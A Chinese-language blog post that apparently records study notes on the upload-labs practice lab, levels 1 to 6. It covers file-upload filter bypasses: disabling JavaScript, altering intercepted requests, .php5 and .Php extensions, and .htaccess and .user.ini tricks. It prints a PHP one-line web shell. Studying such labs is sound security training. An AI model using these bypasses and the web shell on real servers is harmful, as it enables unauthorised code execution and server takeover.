upload-load(1~6)学习

pass-01

首先使用php编写一句话木马上传,显示无法上传.php

upload-load(1~6)学习

 点击F12设置中禁用Jave,随后即可上传。

upload-load(1~6)学习

由于页面无法显示,右击新建标签打开即可

 upload-load(1~6)学习

 pass~02

再次上传一句话木马,如何也无法上传。判断为后端验证。查看原码知道他会验证jpeg、png、gif等格式。需要抓包修改

upload-load(1~6)学习

upload-load(1~6)学习 

 上传修改后的文件成功

upload-load(1~6)学习

pass~03

查看原码有黑名单,却没有禁用畸形后缀名。

upload-load(1~6)学习

 在apache添加 AddType
 

application/x-httpd-php .pht .phtml .phps .php5 .pht

upload-load(1~6)学习

 修改.php为.php5成功上传

upload-load(1~6)学习

 同01查看结果

  pass~04

根据原码分析编写.htaccess文件

AddType application/x-httpd-php xxx

同时将一句话木马后缀改为.jpg,将两文件先后上传

upload-load(1~6)学习

 upload-load(1~6)学习

 同01查看结果

pass~05

查看原码发现发现不仅禁用了畸形后缀名 还禁用了.htaccess

upload-load(1~6)学习

 有上课分析有使用上传.user.ini

upload-load(1~6)学习

 由查询有:

.user.ini文件里的意思是:所有的php文件都自动包含721.jpg文件。.user.ini相当于一个用户自定义的php.ini

接着上传721.jpg文件,文件内容为:<?php @eval($_POST['x721]);?>

如01查询结果

pass~06

查看源码有禁用了.ini    但是没有使用strtolower()函数,可以使用大小写绕过黑名单

upload-load(1~6)学习

 直接修改后缀名为.Php上传成功

upload-load(1~6)学习

 upload-load(1~6)学习

 

上一篇:Spring集成mybatis引用properties时出错


下一篇:csv文件load数据到hive出现乱码